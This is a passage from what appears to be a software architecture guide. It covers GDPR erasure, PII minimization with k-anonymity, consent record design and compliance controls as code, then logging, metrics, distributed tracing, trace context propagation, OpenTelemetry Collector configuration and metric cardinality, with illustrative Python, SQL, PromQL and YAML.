- Each GDPR right is a technical capability; erasure and access are impossible to retrofit cheaply.
- Deletion must reach replicas, caches, indexes, warehouses, streams, logs, backups, and every processor — not just the primary row.
- Crypto-shredding makes erasure workable for append-only and backup data by destroying the per-subject key.
- Anonymize where a record must legally survive; legal holds can lawfully override erasure, and the subject must be told what was retained.
- Use one subject identifier across all stores, and audit every request — one-month deadlines make manual handling unworkable.
🧪 Practice
- Enumerate every store holding personal data in a system you know and write the erasure step for each.
- Design crypto-shredding for an event-sourced store, stating exactly what becomes unreadable and what metadata remains.
- Interview: A user requests erasure but you must keep invoices for seven years. What do you do? (Hint: think about the difference between deleting a record and removing the ability to identify a person from it.)
PII Handling and Minimization
Personally identifiable information is any data that can identify a person directly or in combination with other data. The second half of that definition does the real work: a birth date is not identifying, and neither is a postcode, but the combination of birth date, postcode, and gender identifies a large share of a population. This is why "we removed the names" is not anonymization.
Data minimization is the principle that reverses the default instinct. Collect only what you need for a stated purpose, keep it only as long as that purpose requires, and grant access only to those who need it. Every field you do not collect is a field that cannot leak, cannot be subpoenaed, cannot need encryption, and cannot appear in a breach notification. It is the cheapest security control available, and it is applied at design time or not at all.
# The question to ask for every field is "what breaks if we do not have it?"
SIGNUP_FIELDS = {
"email": {"needed_for": "login and receipts", "keep": True},
"password": {"needed_for": "authentication", "keep": True},
"full_name": {"needed_for": "shipping label", "keep": True},
"birth_date": {"needed_for": "age gate (18+)", "keep": False,
"alternative": "store a boolean is_over_18; verify once"},
"phone": {"needed_for": "nothing yet -- 'maybe SMS later'",
"keep": False, "alternative": "collect it when SMS ships"},
"gender": {"needed_for": "analytics segmentation", "keep": False,
"alternative": "optional, self-described, aggregate only"},
}
# Replacing birth_date with is_over_18 removes a strong quasi-identifier while
# preserving the only thing the business actually needed from it.
# ---- Re-identification risk: why "anonymized" often is not ----------------
def k_anonymity(rows, quasi_identifiers):
"""Smallest group size sharing the same quasi-identifier combination.
k = 1 means at least one person is uniquely identified by these fields."""
from collections import Counter
groups = Counter(tuple(r[q] for q in quasi_identifiers) for r in rows)
return min(groups.values())
QI = ["postcode", "birth_year", "gender"]
# k_anonymity(dataset, QI) == 1 -> publishing this "anonymous" dataset
# identifies people. Generalize (postcode -> region, birth_year -> decade) or
# suppress rare rows until k is at least 5-10 for the intended audience.
Practical handling rules that prevent the routine leaks:
- Do not log PII. Log a subject ID and look it up when needed; a central redaction filter at the logging boundary (11.2) is the enforcement.
- Keep PII out of URLs. Query strings land in access logs, browser history, referrer headers, and third-party analytics.
- Do not use PII as an identifier. Email addresses change and are shared; a synthetic ID is stable and does not leak meaning when it appears in a URL.
- Segregate rather than scatter. Keeping identifying fields in one service behind an API is what makes deletion, audit, and residency tractable.
- Never copy production PII into non-production environments. Use pseudonymized or synthetic data (11.2).
- Apply retention automatically. A field with a retention period that nothing enforces is a field kept forever.
-- Retention as a scheduled job, not a policy document nobody runs.
DELETE FROM login_events WHERE created_at < now() - interval '90 days';
DELETE FROM support_transcripts WHERE closed_at < now() - interval '2 years';
-- Anonymize where the record must survive but the person need not be known.
UPDATE orders
SET customer_email = NULL,
ship_to_name = NULL,
ship_to_line1 = NULL,
ship_to_postcode = left(ship_to_postcode, 3) -- generalize, keep geo stats
WHERE placed_at < now() - interval '7 years';
Key Takeaways
- PII includes data identifying a person in combination with other data; removing names does not anonymize a dataset.
- Minimization is the cheapest control: data not collected cannot leak, cannot be breached, and needs no protection.
- Replace sensitive fields with derived answers where possible (
is_over_18instead of a birth date).- Measure re-identification risk with k-anonymity over quasi-identifiers before publishing or sharing any "anonymized" dataset.
- Keep PII out of logs and URLs, never use it as an identifier, segregate it behind one service, and enforce retention with a scheduled job.
🧪 Practice
- Review a signup form field by field and justify each one's necessity or propose a less identifying substitute.
- Compute k-anonymity for a dataset using postcode, birth year, and gender, then generalize fields until k is at least 5.
- Interview: Marketing wants to keep all user data forever "in case it becomes useful". How do you respond? (Hint: frame it in terms of the lawful basis for retention and the expected cost of holding it during a breach.)
Consent Management
Consent is one lawful basis for processing personal data, and where it applies it must be freely given, specific, informed, and unambiguous — with withdrawal as easy as granting. Those adjectives are technical requirements: "specific" means per-purpose rather than blanket, "informed" means the purpose is stated at the time, and "unambiguous" rules out pre-ticked boxes and inferred agreement.
The architectural consequence is that consent cannot be a boolean column. It must be a versioned, timestamped record per purpose, retained as evidence, because the obligation is to demonstrate that consent was validly obtained — which means knowing exactly what text the person agreed to and when.
from dataclasses import dataclass
import time
@dataclass(frozen=True) # immutable: consent records are evidence
class ConsentRecord:
subject_id: str
purpose: str # "marketing_email" | "analytics" | "personalization"
granted: bool
policy_version: str # WHICH text they agreed to
timestamp: float
method: str # "signup_form" | "preferences_page" | "api"
evidence: dict # ip, user agent, the exact wording shown
class ConsentStore:
"""Append-only. A withdrawal is a NEW record, never an update of the old one:
you must be able to prove what was true at any past moment."""
def __init__(self, store): self.store = store
def record(self, rec: ConsentRecord):
self.store.append(rec)
def current(self, subject_id, purpose) -> bool:
history = self.store.query(subject_id=subject_id, purpose=purpose)
latest = max(history, key=lambda r: r.timestamp, default=None)
return bool(latest and latest.granted)
def was_granted_at(self, subject_id, purpose, at: float) -> bool:
# The question an auditor asks: "was this email lawful when you sent it?"
prior = [r for r in self.store.query(subject_id=subject_id, purpose=purpose)
if r.timestamp <= at]
return bool(prior and max(prior, key=lambda r: r.timestamp).granted)
# Enforcement belongs at the point of processing, checked every time.
def send_marketing_email(subject_id, consent: ConsentStore, mailer):
if not consent.current(subject_id, "marketing_email"):
return # silently skip, do not queue
mailer.send(subject_id)
# Withdrawal must be as easy as granting, and must take effect immediately --
# including for work already queued.
def withdraw(subject_id, purpose, consent, queues):
consent.record(ConsentRecord(subject_id, purpose, False, CURRENT_POLICY,
time.time(), "preferences_page", evidence={}))
queues.cancel_pending(subject_id, purpose) # the step most often missed
CONSENT LIFECYCLE
presented ---> granted (v2.1, 2026-03-04) ---> processing permitted
| |
| +--> policy updated to v3.0 -> RE-CONSENT for new purposes
| (an existing consent does not extend to a new purpose)
|
+--> declined --> processing on this basis is unlawful; the product
must still work for everything not requiring it
withdrawn (2026-08-26) --> processing stops immediately, including queued work
historical records of the consent itself are KEPT
as evidence -- withdrawal is not erasure
The design rules that follow:
- Granular by purpose. Analytics, marketing, and personalization are separate consents; bundling them makes none of them valid.
- Opt-in, unticked, symmetric. Withdrawal must be no harder than granting — one click if granting was one click.
- No service conditioning. Denying optional consent must not break unrelated functionality, or the consent is not freely given.
- Enforce at the processing point, not at collection. Every job, export, and third-party sync checks current consent, because consent changes after data is collected.
- Propagate withdrawals to processors. An analytics vendor still holding the data continues processing unless told.
- Version the policy text and re-request consent when purposes change; a cosmetic wording change does not require re-consent, a new purpose does.
Consent is also not always the right basis, and defaulting to it is a common mistake. Contract, legal obligation, and legitimate interest cover most core functionality — you do not need consent to charge for what someone bought. Using consent where another basis applies is worse, because it grants a withdrawal right that then breaks the service.
Key Takeaways
- Consent must be specific, informed, unambiguous, and as easy to withdraw as to give — all of which are technical requirements.
- Store consent as immutable, versioned, timestamped records per purpose, with the policy version and evidence; a boolean column cannot demonstrate compliance.
- Check consent at the point of processing every time, not once at collection.
- Withdrawal takes effect immediately, including cancelling queued work and notifying processors.
- Consent is only one lawful basis; using it where contract or legal obligation applies creates a withdrawal right that breaks the service.
🧪 Practice
- Design the consent schema for a product with marketing, analytics, and personalization purposes, including what evidence each record stores.
- Implement
was_granted_atand use it to verify that a past marketing send was lawful.- Interview: A user withdraws analytics consent. What must happen, and how far does it reach? (Hint: think about queued jobs, third-party processors, and data already collected under the earlier consent.)
Compliance-Driven Architecture
Some regulatory requirements can be satisfied operationally — a policy, a process, a quarterly review. Others are structural, and attempting to satisfy them with process is how organizations end up in an eighteen-month remediation programme. Distinguishing the two early is the architectural skill.
The test is whether the requirement demands a capability the system either has or does not have. "Encrypt data at rest" is a configuration change. "Produce everything you hold about a person within 30 days" is a capability, and a system without a central subject identifier does not have it at any price short of a rewrite.
| Requirement | Structural implication |
|---|---|
| Right to erasure / access | One subject ID across all stores; deletion fan-out |
| Data residency | Regional partitioning from the start |
| Audit trail of all access | Separate immutable log; read events captured |
| Retention limits | Per-record timestamps and automated purge jobs |
| Segregation of duties (SOX) | No single identity can both change and approve |
| PCI DSS scope reduction | Tokenization boundary; card data isolated |
| Breach notification within 72h | Detection and scoping capability, rehearsed |
| Explainable automated decisions | Store model version, inputs, and rationale |
# Compliance as executable controls, not as a document. Each check maps to a
# named requirement and runs in CI or continuously against live configuration.
CONTROLS = [
{
"id": "GDPR-17", "requirement": "Right to erasure",
"check": lambda env: env.has_capability("erase_subject")
and env.erasure_p95_days() < 30,
"evidence": "erasure_runbook + last 100 request completion times",
},
{
"id": "PCI-3.4", "requirement": "PAN unreadable wherever stored",
"check": lambda env: env.scan_for_pan_patterns() == [],
"evidence": "quarterly scan output",
},
{
"id": "SOX-404", "requirement": "Segregation of duties on deploys",
"check": lambda env: env.no_self_approved_prod_deploys(),
"evidence": "deploy log with approver != author",
},
{
"id": "SOC2-CC6.1", "requirement": "Least privilege access review",
"check": lambda env: env.stale_grants(days=90) == [],
"evidence": "access review records",
},
]
def run_controls(env):
failures = [c for c in CONTROLS if not c["check"](env)]
for c in failures:
alert(f"CONTROL FAILING {c['id']}: {c['requirement']}")
return failures
# Continuous evidence beats an annual scramble: the audit becomes an export
# rather than a project, and drift is caught in days rather than at renewal.
Three design patterns recur across regimes and are worth reaching for deliberately:
Scope reduction. The cheapest way to satisfy a requirement is to have less in scope. Tokenizing card data confines PCI obligations to the vault (11.2); isolating health data in one service keeps the rest of the estate out of HIPAA scope. Ask what the boundary would have to be for most systems to fall outside it, then build that boundary.
Evidence by construction. Design so that normal operation produces the evidence an auditor needs — deploy logs with approvers, access logs with reasons, immutable audit trails — rather than reconstructing it later from memory and screenshots.
Policy as code. Encode requirements as automated checks in CI and in runtime configuration scanning, so violations are caught at the pull request rather than at the audit.
Two cautions. Compliance is a floor, not a ceiling: a system can be fully compliant and insecure, since regulation lags threats by years. And over-engineering for regulations you are not subject to is a real cost — determine which regimes actually apply to your data, sectors, and markets before designing for all of them. The right sequence is to identify applicable regimes, extract the structural requirements, design those in from the start, and automate the evidence.
Key Takeaways
- Separate structural requirements from operational ones; structural ones must be designed in and cannot be retrofitted cheaply.
- Reduce scope deliberately — tokenization and isolation keep most of the estate out of the strictest regimes.
- Generate evidence as a by-product of normal operation so audits become an export rather than a project.
- Encode controls as automated checks that run continuously, not as documents reviewed annually.
- Compliance is a floor, not security; and designing for regimes you are not subject to is a real and avoidable cost.
🧪 Practice
- List the regimes that apply to a system you know and mark each requirement as structural or operational.
- Write three automated compliance checks with the evidence each produces, and run them against a real environment.
- Interview: How would you reduce PCI scope for an e-commerce platform? (Hint: think about which systems ever need to see a real card number, and what could stand in for it everywhere else.)
<a id="12-observability-and-operations"></a>
12. Observability and Operations
A system you cannot see inside is a system you cannot operate, and every design decision in the previous chapters is a guess until production data confirms it. This chapter covers the telemetry that makes behaviour visible, the monitoring and alerting that turns telemetry into timely human action, the deployment techniques that let you change a running system without breaking it, and the infrastructure practices that keep environments reproducible rather than archaeological.
<a id="121-telemetry-pillars"></a>
12.1 Telemetry Pillars
Observability rests on three kinds of signal — logs, metrics, and traces — that answer different questions and cost very different amounts. This subchapter covers each, how context is carried across service boundaries to connect them, the standards that stop instrumentation from being vendor-specific, and the cardinality and sampling decisions that determine whether the bill is sustainable.
Structured Logging
A log is a record of a discrete event. The traditional form is a line of prose meant for a human to read, which works fine when one process runs on one machine and a person tails the file. It stops working the moment you have forty instances, because answering "how many times did this happen for enterprise customers in the last hour?" requires parsing prose with regular expressions — and those regexes break every time someone rewords a message.
Structured logging fixes this by emitting events as key-value data rather than sentences. The message becomes a stable event name and the variable parts become typed fields, so logs are queryable like a database rather than searchable like a book.
UNSTRUCTURED STRUCTURED
2026-08-26 10:15:04 ERROR Payment {"ts":"2026-08-26T10:15:04Z",
failed for user 8891 after 3 "level":"error","event":"payment_failed",
retries (card declined) "user_id":"8891","retries":3,
"reason":"card_declined",
To count declines by reason: "trace_id":"4bf92f...","amount":35.98}
grep + regex + hope nobody
reworded the message To count declines by reason:
GROUP BY reason
Fields are trapped in prose. Fields are queryable, typed, stable.
import structlog, uuid
log = structlog.get_logger()
# ---- Bind context once; every subsequent line inherits it ------------------
def handle_request(request):
request_log = log.bind(
request_id=request.id,
trace_id=request.trace_id, # ties this log to a trace (see below)
user_id=request.user.id,
endpoint=request.path,
)
request_log.info("request_started", method=request.method)
try:
result = process(request, request_log)
request_log.info("request_completed",
status=200,
duration_ms=result.elapsed_ms) # a number, not text
return result
except PaymentDeclined as e:
# The event name is STABLE; the details are fields. Renaming a field is
# a breaking change you can search for; rewording prose is invisible.
request_log.error("payment_failed",
reason=e.code, retries=e.attempts, amount=e.amount)
raise
# ---- What not to do --------------------------------------------------------
# log.info(f"User {user.email} paid {amount}")
# - interpolated: the fields cannot be aggregated
# - contains PII: emails do not belong in logs at all (see 11.4)
# - no event name: nothing stable to group by
Log levels exist to control volume and urgency, and using them consistently
matters more than the exact taxonomy. A workable convention: ERROR means a
request failed and someone should eventually look; WARN means something
unexpected that the system handled; INFO records significant state changes;
DEBUG is developer detail, off in production by default. The common failure is
ERROR for conditions nobody acts on, which trains everyone to ignore errors.
| Practice | Why it matters |
|---|---|
| Stable event names, variable fields | Aggregation survives rewording |
Include trace_id and request_id | Connects logs to traces and to each other |
| Log durations as numbers | Enables percentiles without parsing |
| Never log PII, secrets, or tokens | Logs are widely readable and long-lived (11.2, 11.4) |
| Sample high-volume success logs | Cost scales with volume; failures matter more |
| One event per meaningful occurrence | Duplicate logging inflates cost and distorts counts |
Logs are the most expensive pillar per unit of insight, because they are unaggregated: a million requests produce a million records. That is exactly what makes them irreplaceable for the specific case ("what happened to this request?") and a poor choice for the aggregate case ("what is the error rate?"), which metrics answer far more cheaply.
Key Takeaways
- Structured logs are queryable key-value events; prose logs trap their data in sentences that regexes must recover.
- Keep event names stable and put variability in typed fields.
- Bind request-scoped context once (
trace_id,request_id, user) so every line can be correlated.- Reserve
ERRORfor things someone will act on, or the level becomes noise.- Logs answer "what happened to this one request?" — use metrics for aggregate questions, since logs cost per event.
🧪 Practice
- Convert five interpolated log statements into structured events with stable names and typed fields.
- Write a query over structured logs that counts payment failures by reason per hour, and explain why the same query is fragile against prose logs.
- Interview: When would you choose a log over a metric? (Hint: think about whether the question is about one request or about all of them, and what the storage cost of each answer is.)
Metrics and Aggregation
A metric is a numeric measurement aggregated over time. Where a log records each event individually, a metric records a summary — a count, a sum, a distribution — so a million requests become a handful of numbers per interval. That compression is the entire point: metrics are cheap enough to keep for every service at all times, which makes them the right substrate for dashboards and alerts.
The trade is that aggregation discards detail. A metric can tell you the error rate tripled; it cannot tell you which customer was affected. The correct mental model is that metrics detect and quantify problems, while logs and traces diagnose them.
The four instrument types cover nearly everything:
| Type | Semantics | Example | Query pattern |
|---|---|---|---|
| Counter | Monotonically increasing total | requests, errors, bytes sent | rate() over time |
| Gauge | A value that goes up and down | queue depth, memory, connections | current value, min/max |
| Histogram | Distribution bucketed at record time | request duration, payload size | percentiles, heatmaps |
| Summary | Client-side computed quantiles | latency (pre-aggregated) | read directly (rarely preferred) |
from prometheus_client import Counter, Gauge, Histogram
# ---- Counter: only ever goes up; the DERIVATIVE is what you graph -----------
requests_total = Counter(
"http_requests_total", "Total HTTP requests",
["method", "endpoint", "status"], # labels: keep these LOW cardinality
)
# ---- Gauge: a point-in-time value that can decrease ------------------------
queue_depth = Gauge("job_queue_depth", "Jobs waiting", ["queue"])
# ---- Histogram: buckets chosen to bracket your SLO -------------------------
request_duration = Histogram(
"http_request_duration_seconds", "Request duration",
["endpoint"],
buckets=(.005, .01, .025, .05, .1, .25, .5, 1, 2.5, 5, 10),
# Buckets are fixed at definition time and cannot be changed retroactively.
# Put a boundary exactly at your SLO threshold (e.g. 0.25) so the
# "fraction of requests under SLO" query is exact rather than interpolated.
)
def handle(request):
with request_duration.labels(endpoint=request.route).time(): # observes on exit
response = process(request)
requests_total.labels(method=request.method,
endpoint=request.route, # the ROUTE PATTERN...
status=response.status).inc()
# ...never request.path -- "/orders/8891" would create one time series per
# order id. See "Cardinality and Sampling" below; this single mistake is
# the most common cause of a monitoring system falling over.
return response
# Rate of requests per second, averaged over 5 minutes.
# Always rate() a counter: the raw value is meaningless (it resets on restart,
# and rate() handles the reset correctly).
sum(rate(http_requests_total[5m])) by (endpoint)
# Error ratio -- the numerator and denominator must use the same window.
sum(rate(http_requests_total{status=~"5.."}[5m]))
/ sum(rate(http_requests_total[5m]))
# p99 latency from histogram buckets, aggregated across instances FIRST.
histogram_quantile(0.99,
sum(rate(http_request_duration_seconds_bucket[5m])) by (le, endpoint))
# ^ summing buckets before computing the quantile is correct;
# averaging per-instance p99s is not (see the next topic).
Two properties of metrics shape how they are used. They are pull or push based and time-aligned, so every series has a value per scrape interval — which makes them ideal for arithmetic across services. And they have fixed cost per series per interval, independent of traffic, which is why a metric can cover a million requests per second at the same cost as ten.
Key Takeaways
- Metrics aggregate at record time, giving fixed cost independent of traffic — the right substrate for dashboards and alerts.
- Counters go up and are always queried with
rate(); gauges move both ways; histograms capture distributions.- Choose histogram buckets deliberately and place one boundary at your SLO threshold — buckets cannot be changed retroactively.
- Label with route patterns and other low-cardinality values, never with IDs.
- Metrics detect and quantify; logs and traces diagnose.
🧪 Practice
- Instrument an endpoint with a counter and a histogram, choosing buckets around a 250 ms SLO.
- Write queries for request rate, error ratio, and p95 latency by endpoint, all over the same time window.
- Interview: Why do you almost never graph a counter's raw value? (Hint: think about what happens to the number when a process restarts, and what question you were actually asking.)
Distributed Tracing
When a single user request touches eight services, neither logs nor metrics answer the question that matters: where did the time go, and which hop failed? Metrics show that the checkout endpoint is slow; logs show individual events in individual services with no inherent connection. Tracing supplies the missing structure by recording the causal tree of one request across every service it touched.
A trace is one request end to end. A span is one unit of work inside it — an HTTP handler, a database query, a call to another service — with a start time, a duration, attributes, and a parent. Spans form a tree, and rendering that tree against time produces the waterfall view that makes latency obvious.
ONE TRACE, trace_id=4bf92f3577b34da6
api-gateway ├────────────────────────────────────────────────┤ 310 ms
orders │ ├──────────────────────────────────────────┤ 295 ms
auth │ │ ├──┤ 12 ms
pricing │ │ ├────────┤ 45 ms
inventory │ │ ├──────────────────────────┤ 210 ms <--
db query │ │ │ ├──┤ 8 ms
vendor │ │ │ ├───────────────────┤ 195 ms <--
notify │ │ ├─┤ 5 ms
0ms 310ms
The waterfall answers instantly what metrics cannot: 195 of 310 ms is one
third-party call inside inventory. Without the tree you would be reading
five services' dashboards and guessing.
from opentelemetry import trace
tracer = trace.get_tracer(__name__)
def checkout(cart, user):
# A span for the logical operation, not for every function call: spans have
# cost, and a trace with 4,000 spans is unreadable as well as expensive.
with tracer.start_as_current_span("checkout") as span:
span.set_attribute("user.tier", user.tier) # low cardinality: good
span.set_attribute("cart.item_count", len(cart.items))
span.set_attribute("user.id", user.id) # high cardinality is FINE on a
# span (unlike a metric label):
# spans are individual records
try:
price = quote(cart) # child spans are created automatically
reserve(cart) # by instrumented HTTP/DB clients
order = place(cart, price)
span.set_attribute("order.id", order.id)
return order
except Exception as e:
span.record_exception(e) # attaches the stack trace
span.set_status(trace.Status(trace.StatusCode.ERROR, str(e)))
raise # never swallow to "fix" a span
def quote(cart):
with tracer.start_as_current_span("pricing.quote") as span:
span.set_attribute("pricing.rules_version", RULES_VERSION)
...
The single most valuable practice is to link the three pillars: put the
trace_id in every log line (as in the logging topic) and attach exemplar trace
IDs to metrics. That turns investigation into navigation — a latency spike on a
dashboard leads to an exemplar trace, which leads to the slow span, which leads
to that service's logs for that exact request.
Two cautions. Tracing has real overhead, in the instrumented process and in the backend, which is why sampling exists (below). And traces are only as complete as context propagation allows: one service that fails to forward the trace headers severs the tree, and everything beyond it becomes invisible — which is the subject of the next topic.
Key Takeaways
- A trace is one request's causal tree across services; a span is one unit of work with a parent, duration, and attributes.
- The waterfall view answers "where did the time go?" — a question metrics and logs cannot answer across service boundaries.
- Span attributes may be high cardinality (unlike metric labels) because spans are individual records.
- Record exceptions and set span status on failure so error traces are findable.
- Link pillars by putting
trace_idin logs and exemplars on metrics; that is what makes investigation navigation rather than guesswork.
🧪 Practice
- Instrument a two-service call path and view the resulting waterfall, identifying which span dominates.
- Add span attributes that would let you distinguish slow requests by customer tier and by feature flag state.
- Interview: A dashboard shows p99 latency doubled but every service's own latency looks normal. What is happening? (Hint: think about what a trace shows that per-service metrics cannot, including time spent between spans.)
Span Context Propagation
A trace only exists because every participant agrees on an identifier and passes it along. Span context propagation is the mechanism: a small piece of data — the trace ID, the current span ID, and sampling flags — travels with the request across every process boundary, so a receiving service knows which trace it is part of and which span it descends from.
Without it, each service starts its own unrelated trace and you get eight disconnected single-span traces instead of one tree. This is the most common reason tracing "does not work" in practice, and the break is usually one uninstrumented client, one message queue, or one thread pool.
W3C TRACE CONTEXT -- the standard headers
traceparent: 00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01
| | | |
| trace-id (16 bytes) parent span-id flags
version 01 = sampled
tracestate: vendor1=value,vendor2=value (vendor-specific extras)
PROPAGATION ACROSS A CALL
[service A] span 00f067aa (parent: none)
| HTTP request, injects headers
| traceparent: 00-4bf92f...-00f067aa-01
v
[service B] extracts -> creates span a3ce929d with parent 00f067aa
| publishes a message, injects headers INTO THE MESSAGE
v
( broker ) headers ride with the message, possibly for hours
v
[worker C] extracts -> span continues the same trace_id
(a "follows-from" link rather than a child, since the parent
request has usually finished by the time the worker runs)
from opentelemetry import trace, context
from opentelemetry.propagate import inject, extract
# ---- Outbound: inject context into whatever carrier you are using ----------
def call_downstream(url, payload):
headers = {}
inject(headers) # writes `traceparent` / `tracestate`
return requests.post(url, json=payload, headers=headers, timeout=2)
# ---- Inbound: extract before creating the server span ----------------------
def handle_http(request):
ctx = extract(request.headers) # None-safe: absent headers start a new trace
with tracer.start_as_current_span("http.server", context=ctx):
return route(request)
# ---- Asynchronous boundaries: the case people forget -----------------------
def publish(message, producer):
carrier = {}
inject(carrier) # context travels IN the message
producer.send(topic="orders", value=message, headers=list(carrier.items()))
def consume(record):
ctx = extract(dict(record.headers))
# A queued job is not a child of a still-running request -- use a LINK so
# the relationship is recorded without implying the parent is waiting.
link = trace.Link(trace.get_current_span(ctx).get_span_context())
with tracer.start_as_current_span("order.process", links=[link]):
process(record.value)
# ---- Thread and task boundaries: context is thread-local -------------------
def offload(fn, executor):
ctx = context.get_current() # capture on the calling thread
def wrapped():
token = context.attach(ctx) # restore inside the worker thread
try:
return fn()
finally:
context.detach(token) # always detach, or context leaks
return executor.submit(wrapped)
Two design consequences follow. Sampling decisions must propagate, because
the flag in traceparent is what makes every service agree to record the same
trace — if each service sampled independently at 10%, the probability of a
complete eight-service trace would be one in ten million. And propagation is a
cross-team contract: gateways, proxies, service meshes, and third-party SDKs
must all forward the headers, so an allowlist-based proxy that strips unknown
headers silently destroys tracing everywhere behind it.
Baggage is a related mechanism worth knowing: arbitrary key-value pairs that
propagate alongside trace context, letting an upstream annotation (say,
tenant.tier=enterprise) be readable by every downstream service. It is useful
and easily abused — everything in baggage is copied on every hop, and it crosses
trust boundaries, so it must never carry secrets or PII.
Key Takeaways
- Propagation carries trace ID, span ID, and sampling flags across every boundary; without it you get disconnected single-span traces.
- W3C
traceparent/tracestateis the interoperable standard — prefer it over vendor-specific headers.- Inject and extract at asynchronous boundaries too (queues, jobs), using links rather than parent-child when the parent has finished.
- Context is thread-local: capture and re-attach it explicitly when work moves to another thread or task.
- The sampling decision must propagate, or complete multi-service traces become statistically impossible; proxies that strip headers break tracing silently.
🧪 Practice
- Trace a request through an HTTP call and a queued job, and verify all spans share one trace ID.
- Break propagation deliberately in one service and observe exactly what the trace view shows afterwards.
- Interview: Why must the sampling decision be made once and propagated? (Hint: compute the probability that eight services independently sampling at 10% all choose to record the same request.)
OpenTelemetry Standards
Before OpenTelemetry, instrumentation was vendor-specific: choosing a monitoring backend meant adopting its SDK throughout your code, and changing backends meant re-instrumenting everything. That coupling was expensive enough that teams tolerated bad tooling to avoid it, and it made polyglot systems especially painful — every language needed a different vendor library with different semantics.
OpenTelemetry (OTel) is a vendor-neutral standard covering all three signals. It
defines an API you write against, an SDK that implements it, a wire protocol
(OTLP), and — most valuable and least appreciated — semantic conventions: the
agreed names for common attributes, so http.request.method means the same thing
in every language and every backend.
ARCHITECTURE
your code -> OTel API (stable; what you write against)
|
OTel SDK (sampling, batching, processors, resource detection)
|
OTLP (the wire protocol)
|
[ OTel Collector ] <-- the seam that makes backends swappable
/ | \
Prometheus Jaeger vendor backend
(metrics) (traces) (anything)
Change the backend: edit the Collector's config. Application code untouched.
from opentelemetry import trace, metrics
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.sdk.resources import Resource
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
# Resource attributes identify the emitting entity and are attached to every
# signal, which is what lets you filter all telemetry by service or version.
resource = Resource.create({
"service.name": "orders", # required by convention
"service.version": "1.14.2",
"deployment.environment": "production",
})
provider = TracerProvider(resource=resource)
provider.add_span_processor(
# Batching is not an optimization detail: exporting per span would add a
# network round trip to every operation you are trying to measure.
BatchSpanProcessor(OTLPSpanExporter(endpoint="http://collector:4317"),
max_queue_size=2048, schedule_delay_millis=5000)
)
trace.set_tracer_provider(provider)
# Semantic conventions: use the standard names so backends and dashboards
# understand your data without per-service configuration.
with trace.get_tracer(__name__).start_as_current_span("GET /orders/{id}") as s:
s.set_attribute("http.request.method", "GET") # NOT "method"
s.set_attribute("url.path", "/orders/8891") # NOT "path"
s.set_attribute("http.response.status_code", 200) # NOT "status"
s.set_attribute("server.address", "orders.internal")
# The Collector: receive, process, export. Running one is what turns backend
# choice into a configuration change and gives you one place to enforce policy.
receivers:
otlp:
protocols: { grpc: { endpoint: 0.0.0.0:4317 }, http: {} }
processors:
batch: { timeout: 10s, send_batch_size: 1024 }
memory_limiter: { check_interval: 1s, limit_mib: 512 } # protect the collector
attributes: # central redaction: one place, every service
actions:
- key: user.email
action: delete
- key: http.request.header.authorization
action: delete
tail_sampling: # decide AFTER the full trace is assembled
policies:
- name: keep-errors
type: status_code
status_code: { status_codes: [ERROR] }
- name: keep-slow
type: latency
latency: { threshold_ms: 1000 }
- name: sample-the-rest
type: probabilistic
probabilistic: { sampling_percentage: 1 }
exporters:
prometheus: { endpoint: 0.0.0.0:8889 }
otlp/traces: { endpoint: jaeger:4317 }
service:
pipelines:
traces: { receivers: [otlp], processors: [memory_limiter, tail_sampling, batch], exporters: [otlp/traces] }
metrics: { receivers: [otlp], processors: [memory_limiter, batch], exporters: [prometheus] }
The architectural argument for running a Collector rather than exporting directly from each application: it decouples applications from backends, gives one place to apply redaction and sampling policy, buffers during backend outages so telemetry is not lost, and lets you fan out to several destinations during a migration. Applications then need to know one endpoint and nothing about where the data ultimately lands.
Maturity differs by signal — tracing and metrics are stable across major languages, while logging support arrived later and often still routes through existing logging libraries with an OTel bridge. Auto-instrumentation covers common frameworks and HTTP/DB clients with no code changes, which is the fastest way to get a useful trace tree; manual spans are then added for business-level operations that libraries cannot see.
Key Takeaways
- OpenTelemetry decouples instrumentation from backends: write once, export anywhere, change vendors by configuration.
- Semantic conventions are the underrated part — standard attribute names make telemetry portable and dashboards reusable.
- Set resource attributes (
service.name, version, environment) so every signal can be filtered by its origin.- Run a Collector as the seam: central redaction and sampling policy, buffering, and multi-backend fan-out.
- Start with auto-instrumentation for frameworks and clients, then add manual spans for business operations.
🧪 Practice
- Instrument a service with auto-instrumentation plus one manual span, and export through a local Collector.
- Configure the Collector to drop two sensitive attributes and verify they never reach the backend.
- Interview: Why run a Collector instead of exporting straight to the backend? (Hint: think about what happens during a backend outage, and where you would otherwise have to change redaction policy.)
Cardinality and Sampling
Telemetry cost is not driven by traffic alone but by distinctness, and this is where monitoring bills and monitoring outages both originate. Cardinality is the number of unique time series a metric produces: the product of the number of distinct values across all its labels. Adding one unbounded label can multiply your series count by millions.
# Cardinality is multiplicative. Compute it before shipping the label.
def series_count(**label_value_counts):
total = 1
for _, n in label_value_counts.items():
total *= n
return total
# Reasonable
print(series_count(endpoint=40, method=5, status=6)) # 1,200 series
# One innocuous addition
print(series_count(endpoint=40, method=5, status=6, region=4)) # 4,800 fine
# The mistake that takes down a metrics backend
print(series_count(endpoint=40, method=5, status=6, user_id=500_000))
# 600,000,000 series -- each with its own memory, index entry, and retention.
#
# Labels that are ALWAYS wrong on a metric: user_id, order_id, session_id,
# request_id, email, full URL path, raw error message, timestamp.
# Those belong on SPANS and LOGS, which are individual records rather than
# time series -- high cardinality there is free by comparison.
The rule that follows: metrics need bounded labels; traces and logs carry the detail. If you want per-user investigation, find the user's trace, not their metric series. A useful discipline is to require that any new label has a known, enumerable set of values, and to normalize anything else — route patterns instead of paths, error classes instead of messages, bucketed sizes instead of exact byte counts.
Sampling is the corresponding lever for traces and logs, where volume rather than distinctness drives cost. The choice is when the decision is made.
| Strategy | Decision point | Keeps errors? | Cost / complexity |
|---|---|---|---|
| Head-based, fixed | At trace start | Only by luck | Cheapest, simplest |
| Head-based, rate-limited | At trace start, per second budget | By luck | Cheap; protects the backend |
| Tail-based | After the trace completes | Yes, deterministically | Needs buffering in a collector |
| Adaptive | Dynamic rate per route | Depends | Complex; good at extreme scale |
# Head-based sampling is a decision made before you know what happened,
# which is its whole weakness: errors are rare, and rare things get dropped.
import random
def head_sample(trace_id: str, rate: float) -> bool:
# Deterministic on trace_id so every service makes the SAME decision from
# the propagated ID -- never random per service (see propagation topic).
